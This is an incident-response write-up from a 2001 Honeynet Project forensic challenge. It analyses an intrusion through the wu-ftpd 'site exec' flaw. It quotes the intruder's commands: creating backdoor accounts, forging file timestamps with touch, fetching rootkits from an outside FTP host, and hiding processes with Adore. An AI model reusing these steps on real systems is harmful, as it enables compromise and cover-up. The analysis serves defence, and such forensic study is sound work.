###################################################################### # # # Project Honeynet - Scan 19 - 2001.10 # # Author: Jason Prost # # jprost@telenisus.com # # ###################################################################### #==================================================================== # 1. Which vulnerability did the intruder exploit? #==================================================================== Two Input Validation Problems in FTPD http://www.cert.org/advisories/CA-2000-13.html "The wu-ftpd "site exec" vulnerability is the result of missing character-formatting argument in several function calls that implement the "site exec" command functionality. Normally if "site exec" is enabled, a user logged into an ftp server (including the 'ftp' or 'anonymous' user) may execute a restricted subset of quoted commands on the server itself. However, if a malicious user can pass character format strings consisting of carefully constructed *printf() conversion characters (%f, %p, %n, etc) while executing a "site exec" command, the ftp daemon may be tricked into executing arbitrary code as root. " The vulnerability is seen during the first ftp session, starting at frame 232, and clearly shown in frames 240 and 245. Finally in frame 414 we can see the issuance of 0bin0sh which effectively gave the hacker root access through the ftp control session. #==================================================================== # 2. What ways, and in what order, did the intruder use to connect # and run commands on the system? #==================================================================== We start seeing suspicious activity well prior to the ftp attempts that give the intruder access to the system. Although the access is from two different addresses it is later seen that both addresses participate in the hacking activity. 1. telnet - 09/16-18:52:51.989869 217.156.93.166:61200 -> 192.168.1.102:23 failed login attempts for nobody and uucp 2. tcp 24 - 09/16-18:54:02.316596 217.156.93.166:61202 -> 192.168.1.102:24 backdoor check for non-standard SSH (port 24) 3. tcp 6666 - 09/16-18:54:14.859871 217.156.93.166:61203 -> 192.168.1.102:6666 backdoor check for non-standard SSH (port 6666) 4. ftp - 09/16-18:55:45.198773 207.35.251.172:2243 -> 192.168.1.102:21 hack system through ftp exploit id w dir [much meandering around /usr/local blahh blahh] passwd -d nobody mkdir /etc/X11/applnk/Internet/.etc mkdir /etc/X11/applnk/Internet/.etcpasswd addusr dns passwd dns -d touch -acmr /etc/X11/applnk/Internet/.etc /etc/passwd touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc [much checking with ls with various command line options] 5. telnet - 09/16-19:13:27.206847 217.156.93.166:61209 -> 192.168.1.102:23 connect back in as nobody w su dns cd /tmp mc -s (not found) ftp teleport.go.ro cd /dev/rd mkdir /dev/sdc0 ftp teleport.go.ro get rootkit Zer0.tar.gz get rootkit copy.tar.gz get rootkit ooty.tar.gz tar -xvf Zer0.tar.gz Go (execute rootkits setup script) 6. tcp 24 - 09/16-19:51:58.559708 217.156.93.166:61223 -> 192.168.1.102:24 connects...does what...dont know 7. tcp 24 - 09/16-19:59:48.228693 217.156.93.166:61226 -> 192.168.1.102:24 8. telnet - 09/16-19:59:57.150510 217.156.93.166:61227 -> 192.168.1.102:23 9. tcp 24 - 09/16-20:07:17.066994 217.156.93.166:61230 ->192.168.1.102:24 #==================================================================== # 3. How did the intruder try to hide his edits from the MAC times? #==================================================================== (I'm assuming that by MAC times you mean the files modification and access timestamps...maybe i'm wrong...) The intruder used the touch command to modify various files access and modification times. The 'a' and 'm' option changes the access time of the file and modification time of the file. Option 'c' prevents files from being created unless they already exist, and option 'r' uses the access and modifications times from a specificed file. example: touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd What is interesting is that the second time the intruder uses this command (touch -acmr /etc/X11/applnk/Internet/.etc /etc) it appears that he/she modified the MAC times of /etc to those of the just created .etc directory. hmmmm??? Additionally the intruder had various scripts within the rootkits that performed various log file cleanup and file time cleanup. #==================================================================== # 4. The intruder downloaded rootkits, what were they called? Are # they new/custom rootkits? #==================================================================== The intruder downloaded three files, although only one was uncompressed and exploded. All appear to be modified/customized kits. - Zer0.tar.gz - adore.h / adr.tgz / adr2.tgz - adore a well known rootkit - Go - titled "t0rnkit" but with the addition of his/her own mod "Modificat de mine... Viruzzel" indicating that he/she has modified the script - ssh.tgz - SSH 1.2.27 with some additions - tls.tgz - includes various elements already contained within Go, as well as login-.c (already compiled), and linsniffer.c (already compiled). - copy.tar.gz - appears to be a custom assembled set of tools. - wu-scan By 03m0s1s / looks for SITE EXEC vuln on other systems - smurf 5.0 (compiled) - ssh 1.2.26 (compiled) - 7350wu.c (zxploit) (compiled) - generate.c / genmass.c / process_list.c (all compiled) - slice2.c (mj2 & mj3) (compiled twice???) - ooty.tar.gz - again another custom assembled set of tools. - bighole.c - modifies sush to proper owner and mode - bindpar.x - a bind hunting tool - Cr0n - written by AKKE - runs every minute /tmp/cron_echo (Cr0n / crontab.c) (compiled) - kernel.c - (compiled) - cursory check doesnt find any known source - motd - a wonderfully worded motd file!!! - suidperl (bighole.c / flare / perl.x / sush) written by Marchew Industries - prlnx.sh (doesnt have all the files necessary to function) #==================================================================== # 5. Recover (tell how you did it too) the rootkits from the snort # binary capture #==================================================================== I refer everyone to christopher lee's write up of scan 18: http://project.honeynet.org/scans/scan18/som/som13/ In it he answers the bonus question by detailing how to pull files from ethereal. This became an easier task than I performed prior with ethereal. Hadnt used the tool yet...although friends kept suggesting it. It is an amazing tool! I also recovered the transferes by extracting out the binary contents of the transfer (the hexcode). Pack the code using perl or some other programming language. then gunzip and untar. However, probably the easiest would be to simply pull it from the same location the hacker did (if you have no scruples and want to break various tresspassing laws). By verifying the directory listing you can be fairly sure that you are looking at the same package. #==================================================================== # 6. What does the rootkit do to hide the presence of the attacker on # the system? #==================================================================== *Specific filesystem mods: touch -acmr /etc/default /etc/pam.d touch -acmr /etc/default /etc/pam.d/* rm -f vrssnk rm -f /usr/info/.t0rn/shsml rm -rf Zer0 cd /usr/X11R6/bin/.,/copy/adr/ rm -rf *tgz rm -rf *.c *.h Makefile* cnfad CVS rm -rf /bin/.bash_history ln -s /dev/null /bin/.bash_history touch -acmr /tmp/.dir1 /bin touch -acmr /tmp/.dir2 /usr/X11R6/bin touch -acmr /tmp/.dir3 /etc/rc.d/rc3.d touch -acmr /root /etc rm -rf /tmp/.dir* *Specific to processes that run it uses Adores ava program to hide them. Go(183): ./ava h /usr/X11R6/bin/., Go(184): ./ava h /usr/info/.t0rn Go(185): ./ava h /dev/rd/sdc0 Go(186): ./ava h /dev/rd/nscd.init Go(187): ./ava h /etc/rc.d/rc3.d/S50inet Go(188): ./ava h /usr/X11R6/lib/X11/.~ Go(199): ./ava h /usr/X11R6/bin/., Go(200): ./ava h /usr/info/.t0rn Go(201): ./ava h /dev/rd/sdc0 Go(202): ./ava h /dev/rd/nscd.init Go(203): ./ava h /etc/rc.d/rc3.d/S50inet Go(204): ./ava h /usr/X11R6/lib/X11/.~ #==================================================================== # 7. What did you learn from this exercise? #==================================================================== Hmmmm...there are several things that proved to be valuable by going through this exercise: 1. how important it is to maintain proper security rev levels of software. it is so easy to fall behind in version numbers and wind up being the target of an attack/hack. 2. How to use Ethereal http://www.ethereal.org 3. The necessity to keep an open mind when performing analysis of scans. Ensure that you check over your work again. Dont rush to conclusions when there is so much data! #==================================================================== # 8. How long did this challenge take you? #==================================================================== 5 hours total (with write up) #==================================================================== # Based on this challenge, write an example letter of notification to # the source owner that attacked the system. Include any evidence or # logs that you feel important. #==================================================================== Although an email and other action are appropriate toward the attacker, I would send an email to admin@teleport.go.ro whos server is still open to the username and password that are now available in your logs. There probably should be some legalese within the letter to ensure that if the administrators are aware that if they were participants that they are guilty through association. I'm not sure that either the Canadian School Project or ns.desteptarea.ro are anything more than hosts the hacker bounced through. An email informing them of the inappropriate use of their systems certainly is called for. And email could be formally sent to to hatcheryhatched@hotmail.com (making the assumption that that is the hackers email addy). Certainly nothing that I would write would provide the proper legal babbeling that is necessary prior to taking whatever other action are necessary. later... jason... --------------------------------------------------------------------- Jason Prost Network Security Engineer 1.630.795.4248 phone 1.877.434.6146 cell jprost@telenisus.com